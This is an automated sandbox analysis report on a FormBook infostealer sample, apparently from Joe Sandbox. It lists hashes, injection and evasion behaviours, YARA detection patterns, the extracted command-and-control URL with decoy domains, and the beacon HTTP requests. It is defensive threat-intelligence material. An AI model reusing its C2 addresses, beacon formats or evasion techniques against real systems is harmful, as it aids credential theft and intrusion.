Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jqPZZhDmjh.exe

Overview

General Information

Sample name:jqPZZhDmjh.exe
renamed because original name is a hash value
Original sample name:ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498.exe
Analysis ID:1392769
MD5:c4127213fc83e9b8d166d5731bac598a
SHA1:c54a87820173ca9fae8809dcc7e99f54b2dac173
SHA256:ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jqPZZhDmjh.exe (PID: 6964 cmdline: C:\Users\user\Desktop\jqPZZhDmjh.exe MD5: C4127213FC83E9B8D166D5731BAC598A)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • raserver.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: D1053D114847677185F248FF98C3F255)
        • cmd.exe (PID: 2828 cmdline: /c del "C:\Users\user\Desktop\jqPZZhDmjh.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
jqPZZhDmjh.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    jqPZZhDmjh.exeJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      jqPZZhDmjh.exeWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x5651:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1bfb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x9dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x14ca7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      jqPZZhDmjh.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8d08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14aa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14591:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14ba7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14d1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x998a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1380c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa683:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ad17:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bd1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      jqPZZhDmjh.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17c39:$sqlite3step: 68 34 1C 7B E1
      • 0x17d4c:$sqlite3step: 68 34 1C 7B E1
      • 0x17c68:$sqlite3text: 68 38 2A 90 C5
      • 0x17d8d:$sqlite3text: 68 38 2A 90 C5
      • 0x17c7b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17da3:$sqlite3blob: 68 53 D8 7F 8C

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5e91:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1c7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa5ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x154e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9548:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x97b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x152e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14dd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x153e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1555f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa1ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1404c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xaec3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b557:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18479:$sqlite3step: 68 34 1C 7B E1
          • 0x1858c:$sqlite3step: 68 34 1C 7B E1
          • 0x184a8:$sqlite3text: 68 38 2A 90 C5
          • 0x185cd:$sqlite3text: 68 38 2A 90 C5
          • 0x184bb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x185e3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 50 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.jqPZZhDmjh.exe.970000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            0.2.jqPZZhDmjh.exe.970000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              0.2.jqPZZhDmjh.exe.970000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              0.2.jqPZZhDmjh.exe.970000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              0.2.jqPZZhDmjh.exe.970000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x17a39:$sqlite3step: 68 34 1C 7B E1
              • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
              • 0x17a68:$sqlite3text: 68 38 2A 90 C5
              • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
              • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
              Click to see the 5 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: jqPZZhDmjh.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://ww25.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7NAvira URL Cloud: Label: phishing
              Source: http://www.theanhedonia.com/gy14/www.soulheroes.onlineAvira URL Cloud: Label: malware
              Source: http://www.roelofsen.onlineAvira URL Cloud: Label: malware
              Source: http://www.elbt-ag.com/gy14/www.twinklethrive.comAvira URL Cloud: Label: malware
              Source: http://www.sgyy3ej2dgwesb5.comAvira URL Cloud: Label: malware
              Source: http://www.venitro.comAvira URL Cloud: Label: malware
              Source: http://www.budgetnurseries.comAvira URL Cloud: Label: malware
              Source: http://www.mtdiyx.xyz/gy14/Avira URL Cloud: Label: phishing
              Source: http://www.truedatalab.comAvira URL Cloud: Label: malware
              Source: http://www.mrbmed.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.truedatalab.com/gy14/www.budgetnurseries.comAvira URL Cloud: Label: malware
              Source: http://www.mrbmed.com/gy14/www.whatsapp1.autosAvira URL Cloud: Label: malware
              Source: http://www.123bu6.shopAvira URL Cloud: Label: phishing
              Source: http://www.123bu6.shop/gy14/www.theanhedonia.comAvira URL Cloud: Label: phishing
              Source: http://www.sgyy3ej2dgwesb5.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.venitro.com/gy14/www.artbydianayorktownva.comAvira URL Cloud: Label: malware
              Source: http://www.ampsportss.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.theanhedonia.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.twinklethrive.com/gy14/www.ampsportss.comAvira URL Cloud: Label: malware
              Source: http://www.roelofsen.online/gy14/Avira URL Cloud: Label: malware
              Source: http://www.mtdiyx.xyzAvira URL Cloud: Label: malware
              Source: http://www.venitro.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.ampsportss.com/gy14/www.sgyy3ej2dgwesb5.comAvira URL Cloud: Label: malware
              Source: http://www.twinklethrive.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.artbydianayorktownva.comAvira URL Cloud: Label: malware
              Source: http://www.883831.com/gy14/www.venitro.comAvira URL Cloud: Label: malware
              Source: http://www.sgyy3ej2dgwesb5.com/gy14/www.883831.comAvira URL Cloud: Label: malware
              Source: http://www.soulheroes.online/gy14/www.roelofsen.onlineAvira URL Cloud: Label: malware
              Source: http://www.123bu6.shop/gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxVAvira URL Cloud: Label: phishing
              Source: http://www.ampsportss.comAvira URL Cloud: Label: malware
              Source: http://www.theanhedonia.comAvira URL Cloud: Label: phishing
              Source: http://www.budgetnurseries.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.whatsapp1.autos/gy14/Avira URL Cloud: Label: malware
              Source: http://www.roelofsen.online/gy14/www.truedatalab.comAvira URL Cloud: Label: malware
              Source: http://www.artbydianayorktownva.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.budgetnurseries.com/gy14/www.mtdiyx.xyzAvira URL Cloud: Label: malware
              Source: http://www.soulheroes.onlineAvira URL Cloud: Label: malware
              Source: www.venitro.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.elbt-ag.com/gy14/Avira URL Cloud: Label: malware
              Source: http://www.soulheroes.online/gy14/Avira URL Cloud: Label: malware
              Source: http://www.123bu6.shop/gy14/Avira URL Cloud: Label: phishing
              Source: http://www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxVAvira URL Cloud: Label: malware
              Source: http://www.mtdiyx.xyz/gy14/www.elbt-ag.comAvira URL Cloud: Label: phishing
              Source: http://www.truedatalab.com/gy14/Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}
              Multi AV Scanner detection for domain / URL
              Source: www.theanhedonia.comVirustotal: Detection: 9%Perma Link
              Source: http://www.theanhedonia.com/gy14/www.soulheroes.onlineVirustotal: Detection: 8%Perma Link
              Multi AV Scanner detection for submitted file
              Source: jqPZZhDmjh.exeReversingLabs: Detection: 89%
              Source: jqPZZhDmjh.exeVirustotal: Detection: 71%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Machine Learning detection for sample
              Source: jqPZZhDmjh.exeJoe Sandbox ML: detected
              Source: jqPZZhDmjh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: jqPZZhDmjh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: jqPZZhDmjh.exe, jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RAServer.pdb source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RAServer.pdbGCTL source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 4x nop then pop esi0_2_00987287
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 4x nop then pop esi0_2_009872D9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 4x nop then pop edi0_2_00986CC5
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 4x nop then pop edi0_2_0097E46A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi3_2_004CE46A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi3_2_004D6CC5
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi3_2_004D72D9
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi3_2_004D7287

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.21.34.218 80Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: www.venitro.com/gy14/
              Source: global trafficHTTP traffic detected: GET /gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxV HTTP/1.1Host: www.123bu6.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV HTTP/1.1Host: www.theanhedonia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox ViewIP Address: 103.224.212.212 103.224.212.212
              Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7CF82 getaddrinfo,setsockopt,recv,2_2_0DF7CF82
              Source: global trafficHTTP traffic detected: GET /gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxV HTTP/1.1Host: www.123bu6.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV HTTP/1.1Host: www.theanhedonia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: unknownDNS traffic detected: queries for: www.123bu6.shop
              Source: explorer.exe, 00000002.00000002.3304893437.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 00000002.00000002.3304893437.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000002.00000002.3304893437.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: explorer.exe, 00000002.00000002.3304893437.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: explorer.exe, 00000002.00000002.3300780586.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3303691234.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3303668178.0000000007B50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: explorer.exe, 00000002.00000002.3315542504.00000000108AF000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000003.00000002.3301253402.0000000004DDF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ww25.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shop
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shop/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shop/gy14/www.theanhedonia.com
